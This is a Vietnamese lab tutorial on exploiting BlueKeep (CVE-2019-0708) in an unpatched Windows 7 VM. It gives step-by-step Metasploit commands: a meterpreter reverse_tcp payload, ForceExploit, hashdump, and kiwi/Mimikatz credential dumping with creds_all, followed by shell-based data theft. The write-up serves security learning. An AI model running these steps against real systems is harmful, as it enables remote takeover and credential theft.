---
# System prepended metadata

title: Exploit BlueKeep RDP Vulnerability CVE-2019-0708 (WIN 7)

---

# Khai thác lỗ hổng BlueKeep RDP Vulnerability CVE-2019-0708 (WIN 7)

:::danger
⚠️ Learning purpose, uses and laboratory set up (Critical Risk)
:::
:::success
- BlueKeep (CVE-2019-0708) là một lỗ hổng nghiêm trọng trong dịch vụ Remote Desktop Services (RDS) trên Windows 7, Windows Server 2008 và 2008 R2.
- Lỗ hổng cho phép tấn công từ xa mà không cần đăng nhập, kẻ tấn công chỉ cần gửi gói RDP đặc biệt để chiếm quyền điều khiển máy.
- BlueKeep còn là lỗi tự lan truyền (wormable), nghĩa là nó có thể lây từ máy này sang máy khác giống như WannaCry.
:::

:::spoiler

- Hai máy cùng trên mạng NAT/host trên cùng 1 LAN
(Xem hướng dẫn)
https://www.youtube.com/watch?v=rAMKgrzO9KQ&t=20s 
https://www.youtube.com/watch?v=Bh1H2Ez6A8Y (infosec channel)
:::

#### Tải Win 7 (bản chưa vá lỗi)

:::spoiler
https://docs.google.com/document/d/10EHePt8qQ0pWFon9lhdxdakotxopyoxCtx_ZZGQrO7w/edit?usp=sharing
:::

#### Tải Kali Linux (chứa Pentest tools)
:::spoiler
https://www.youtube.com/watch?v=bLNWyseSr_w
:::

#### Hiểu về công cụ Nmap
:::spoiler
https://www.youtube.com/watch?v=gN70wz5WFH4
:::

### Bước 1

:::warning
Check ip bằng Command ở Windows 7. Xác định mục tiêu cần tấn công.
:::
![image](https://hackmd.io/_uploads/SyaT7WEfZx.png)

### Bước 2

:::warning
Tắt tường lửa
:::
Vào Control Panel
![image](https://hackmd.io/_uploads/S1T4_bEGbx.png)

Cho phép kết nối từ xa ở System Properties
![image](https://hackmd.io/_uploads/SkGcub4MWe.png)

Turn Firewall on or off > Off hết
![image](https://hackmd.io/_uploads/ryowKbEMWx.png)

:::danger
Trường hợp không tắt Firewall
`Ở Windows 7 hiện`
![image](https://hackmd.io/_uploads/Bynec-Ef-x.png)
`Ở máy exploit > Không thể exploit được lỗ hổng` 
![image](https://hackmd.io/_uploads/rJjbnWNfbx.png)
:::

### Bước 3

:::warning
Sử dụng công cụ Nmap để dò port 3389 - RDP được mở ở Windows 7 (IP 192.168.127.131)
:::
![image](https://hackmd.io/_uploads/Bk9G6UEGWg.png)
⚠️ Lưu ý: Xem trạng thái (STATE) của port đang ở trạng thái nào
```
open : mở
filtered : tường lửa chặn
closed: không bật RDP, tường lửa chặn
```

### Bước 4
:::warning
Exploit lỗ hổng BlueKeep
:::
`Với lệnh: msfconsole`
![image](https://hackmd.io/_uploads/B17ApUVMZx.png)

- Tìm kiếm lỗ hổng
![image](https://hackmd.io/_uploads/SJSrRUEM-l.png)

```
Chúng ta có thể thấy được metasploit có thể quét được lỗ hổng với tên Bluekeep.

Với dòng 0
> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep - dùng để rà soát lỗi BlueKeep (KHÔNG SỬ DỤNG ĐỂ EXPLOIT ĐƯỢC)

Với dòng 3
> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce (Khai thác)
Ta sử dụng dòng này để có thể thâm nhập vào máy nạn nhân và đánh cắp dữ liệu
```

### Bước 5
#### Dùng lệnh show options để xem chi tiết
![image](https://hackmd.io/_uploads/SJcmlDEMWe.png)

:::info
*Nếu trường hợp mà RHOST không đúng với IP máy mục tiêu và LHOST không đúng IP máy exploit thì ta cần phải chỉnh sửa lại với:*

RHOSTS :  ip máy win7
RPORT cổng RPD
LHOST : ip máy Kali (ifconfig)
LPORT 4444 là cổng cục bộ mà công cụ bảo mật (như Metasploit) sử dụng để nhận kết nối từ mục tiêu trong một kịch bản kiểm tra hoặc tấn công.
![image](https://hackmd.io/_uploads/SJGBfvEGbx.png)

:::
![image](https://hackmd.io/_uploads/By_yfwVGbe.png)


#### Set PAYLOAD để máy đối tượng tự kết nối vào máy mình
`set PAYLOAD windows/x64/meterpreter/reverse_tcp`

#### Set các phương tiện cho phù hợp
![image](https://hackmd.io/_uploads/BkaCGvVz-l.png)

### Bước 6
:::warning
**Khai thác hệ thống nhờ lỗi BlueKeep**
:::
![image](https://hackmd.io/_uploads/HJSwmw4MWl.png)

:::spoiler
Trường hợp lỗi: 
``set ForceExploit true``
Sau đó run lại lệnh ``exploit``
→ ForceExploit sẽ tấn công trực tiếp vào hệ thống mà không cần Auxiliary
:::

### Bước 8
:::warning
Để lấy được mật khẩu máy
:::
```
try: ‘? help’
sysinfo
getwd
ipconfig
hashdump để lấy mật khẩu hash
```
![image](https://hackmd.io/_uploads/ryGlrDNGbg.png)

### Bước 9
:::warning
Sử dụng `load kiwi` để lấy thông tin đăng nhập từ máy đã bị xâm nhập.
→ Trích xuất password/hash/ticket từ Windows thông qua Meterpreter.

"kiwi kích hoạt các chức năng của Mimikatz để làm việc với thông tin xác thực"
:::
![image](https://hackmd.io/_uploads/SyjArw4M-l.png)

:::warning
Sử dụng lệnh `creds_all` để xem toàn bộ thông tin từ máy nạn nhân
:::
![image](https://hackmd.io/_uploads/HJpGIwEzbx.png)

### Bước 10
:::warning
Đánh cắp dữ liệu 
:::
Dùng `shell` để điều khiển, kiểm soát hệ thống máy nạn nhân
![image](https://hackmd.io/_uploads/HJuAIDVM-e.png)

**Xem dữ liệu trong máy**
![image](https://hackmd.io/_uploads/H1CEPDVMbx.png)

**Truy vấn dữ liệu**
![image](https://hackmd.io/_uploads/S1ouDv4f-x.png)
Hoàn toàn trùng khớp với dữ liệu có sẵn trong máy nạn nhân
![image](https://hackmd.io/_uploads/rJGivPEMZl.png)